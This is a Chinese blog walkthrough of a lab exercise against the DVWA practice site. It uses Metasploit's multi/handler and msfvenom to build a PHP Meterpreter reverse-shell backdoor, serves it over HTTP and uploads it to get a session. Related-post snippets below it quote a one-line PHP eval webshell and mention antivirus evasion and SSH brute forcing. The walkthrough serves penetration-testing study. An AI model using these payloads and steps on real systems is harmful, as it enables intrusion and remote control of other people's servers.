msf-2

最新推荐文章于 2023-10-06 16:04:59 发布
最新推荐文章于 2023-10-06 16:04:59 发布
阅读量375 收藏 1
点赞数
分类专栏: 工具 渗透测试 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44704184/article/details/125700832
版权

PHP后门反弹连接
1、环境准备
DVWA靶场
若allow_url_include: Disabled 提示没开启
找到php目录里的php.ini allow_url_include 将后面参数OFF 改成On 修改完成重启Nginx生效
2、Metasploit发起攻击
kali:192.168.52.133
win7:192.168.52.139

配置监控-使用handler模块:use exploit/multi/handler
配置攻击载荷设置payload

第一步设置payload

set payload php/meterpreter/reverse_tcp

第二步设置 lhost 和 lport  
set lhost xxxip ;   

set lport  xxx端口;

在这里插入图片描述
生成php后门执行攻击获得meterpreter
新建一个终端在终端内输入

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.52.133 lport=4456 R>shell.php
在这里插入图片描述

使用Python简单的web服务

python -m SimpleHTTPServer 80
在这里插入图片描述
win7访问并下载
在这里插入图片描述
启动攻击
在这里插入图片描述

在dvwa的文件上传中将下载的文件上传,上传成功后访问返回的地址,kali成功连接到靶机
在这里插入图片描述
在这里插入图片描述

凌晨四点的代码
关注
专栏目录
初次使用Phpstudy和配置DVWA_master
deja_vuDM的博客
06-09 1146
在win10虚拟机中安装PHPstudy后,打开phpstudy启动nginx服务与mysql服务,新建一个站点端口使用任意非80端口,这里使用7777,将域名设为localhost,根目录配置为DVMA所在目录,虚拟机只有一个盘,所以在c盘下然后勾选环境,php版本选用的5.69版本,点击确定,网站创建成功后需重启服务,在DVMA目录下的config文件夹里,将config.inc.php.dist文件改为config.inc.php打开此配置文件,将连接数据库的用户名和密码改为root,修改完成后重启服
php-msf-demo
04-29
下载项目git clone https://github.com/pinguo/php-msf-demo.git# Step2. 安装docker镜像构建开发环境.进入项目目录sh build.sh# Step3. 参考Step2输出的信息,使用ssh或者exec进入容器, 到达项目根目录, 安装依赖...
MSF(2)——各种木马的生成及简单的免杀
realmels的博客
06-11 3925
这里是各种木马的生成示例 在实际渗透过程中根据需求生成这里主要是php的免杀和Python的免杀,原理都是自定义加密及解密可参考前文 https://blog.csdn.net/realmels/article/details/119280877重点来了使用上文方法生成的木马,所有的木马都会报毒D盾扫描结果 火绒扫描结果 而对于exe的免杀比较复杂(主要我不会),所以在这里介绍一种简单的免杀方法。我们可以先生成一个Python的msf马,然后利用Python技术,对该木马进行免杀,最后将该木马打包成可
msf信息收集(二)
weixin_43047908的博客
03-20 524
目标信息收集 1、攻击第一步:基础信息收集   (1)whois 查询:   msf > whois example.com (whois查询域名所属信息)   msf> whois 192.168.1.100 (2)traceroute工具来构建目标网络拓扑结构 (3)nslookup (获得子域名信息以及目标网络内部结构) set type=mx   example.com 2、用nmap 探测开放端口和服务: -sS SYN 半开扫描   -sT TCP 半开扫描   -Pn 不使用pin
DVWA-命令注入漏洞获取目标shell并提到最高权限[msfvenom]
King_Ho的博客
12-21 2767
MSF攻击Windows实验: 方法一 :通过web站点,使用无文件的方式攻击利用执行 方法二:通过web站点,上传webshell, 返回给msf 方法三:攻击其他端口服务,拿到meterpreter 信息收集-Nmap端口扫描 信息收集总在前 root@kali:~# nmap -sV -T4 xxx.xxx.xxx.xxx Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:46 CST Not shown: 992 filtered p
使用msf入侵多层级网络架构
热门推荐
06-01 2万+
假设,有一个多层网络环境,每层靶机只与相邻服务器互通,那么,如何从Hack的笔记本层层突破,获取到第4层靶机Server5的系统权限呢?首先,我们通过Web入侵获得Server1权限,并...
MSF-FRONTEND
03-19
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行该应用程序。打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。您还将在控制台中看到任何棉绒...
ADGG-LSF-MSF-v1.0:ADGG-LSF-MSF-v1.0
02-18
建立React材料UI Redux 草稿JS ChartJS 棱镜JS React降价React完整日历快速开始安装依赖项: npm install或yarn 启动服务器: npm run start或yarn start 视图处于打开状态: localhost:3000 推荐最新的...LSF-MSF-v1.0
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块将测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使...
msf-with-rubymine:如何使用Ruby开发metasploit模块
04-10
msf-with-rubymine 如何在RubyMine中使用metasploit1.设置您的开发环境在第一步中安装软件包: : 2.在〜/ .msf4中添加一个Gemfile: # ~/.msf4/Gemfilesource 'https://rubygems.org'gem 'metasploit-framework', ...
使用Kali Linux Metasploit 对WEB应用进行攻击 以DVWA为例
xujing19920814的博客
10-01 2813
使用Kali Linux Metasploit 对WEB应用进行攻击 以DVWA为例
PHP 行事准则:allow_url_fopen 与 allow_url_include
最新发布
两个月亮
10-06 2193
在开启 allow_url_include 配置项后,PHP 仅能够对远程文件进行读写等文件操作。在开启 allow_url_fopen 配置项后,PHP 将能够通过 include 等函数 将远程文件包含至当前文件并将其作为 PHP 代码进行执行。allow_url_include 的生效依赖于 allow_url_fopen 配置项的开启。自 PHP5.2 版本开始,allow_url_include 配置项的默认配置均为 Off,而 allow_url_fopen 配置项的默认配置始终为 On。
文件包含
m0_64338211的博客
03-01 1035
1.本地文件包含 分别修改phpinfo.txt扩展名为:jpg、rar、xxx发现均可解析,只要文件内容符合PHP语法规范,任何扩展名都可以被PHP解析。 2.远程文件包含 文件包含漏洞可以分为LFl (Local File Inclusion本地文件包含)和RFI(Remote File Inclusion,远程文件包含)两种。而区分二者最简单的办法就是通过查看php.ini中是否开启了allow_url_include。如果开启就有可能包含远程文件。 远程文件包含需要php....
allow_url_fopen和allow_url_include详解
qq_41027545的博客
11-15 948
allow_url_fopen 在php.ini中开启后,允许使用file,fopen,file_get_contents打开远程url文件 allow_url_include 开启后,允许 include,REQUEST函数可以包含远程url文件
php.ini中allow_url_fopen和allow_url_include的设置
weixin_30906701的博客
11-02 946
all_url_include在php 5.2以后添加,安全方便的设置(php的默认设置)为:allow_url_fopen=on;all_url_include=off;allow_url_fopen = On (允许打开URL文件,预设启用)allow_url_fopen = Off (禁止打开URL文件)allow_url_incl...
文件包含漏洞—allow_url_fopen和allow_url_include详解
weixin_44431280的博客
02-21 7603
文件包含漏洞_allow_url_fopen和allow_url_include详解 提要:在文件包含漏洞中,PHP脚本环境中php.ini文件中通常会涉及到这两个参数,两个参数的开启或关闭影响文件包含漏洞的利用。 1,参数简介: allow_url_fopen参数(只影响RFI,不影响LFI) 简介:是否允许将URL(HTTP,HTTPS等)作为文件打开处理 allow_url_include参数(只影响RFI,不影响LFI) 简介:是否允许includeI()和require()函数包含URL(HTTP
Kali渗透测试之DVWA系列3——命令执行漏洞
浅浅的博客
05-11 2761
一、命令执行漏洞 命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围内就好比说一句话木马<?php @eval($_POST[cmd]);?> 二、分类 1、代码过滤不严或无过滤 2、系统漏洞可以构造环境变量的值来执行具有攻击力的脚本代码,会影响到bash交互的多种应用,例如:http、ssh、dhcp等 3、调用第三方组件,例如...
一个遭受千百次攻击的良心学习靶机网站DVWA
hackerie的博客
09-15 9878
话不多说,DVWA (Dam Vulnerable Web Application),一个供安全人员学习练手的优秀网站。以后该博客会慢慢收集类似的学习网站。希望大家共同进步!分享、学习、共同进步!
MSF_PHP后门反弹连接_DVWA文件上传木马_Metasploit配置监控及msfvenom生成攻击载荷
qq_51550750的博客
06-02 918
msf——PHP后门反弹连接
msf命令 -p 和-f什么意思
05-16
msf 命令是 Metasploit Framework 的命令行工具。其中,-p 选项是指定要使用的 payload,payload 是指用来执行攻击的代码。而 -f 选项是指定输出文件的格式。例如,你可以使用 -f exe 选项将生成的攻击文件保存为可...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值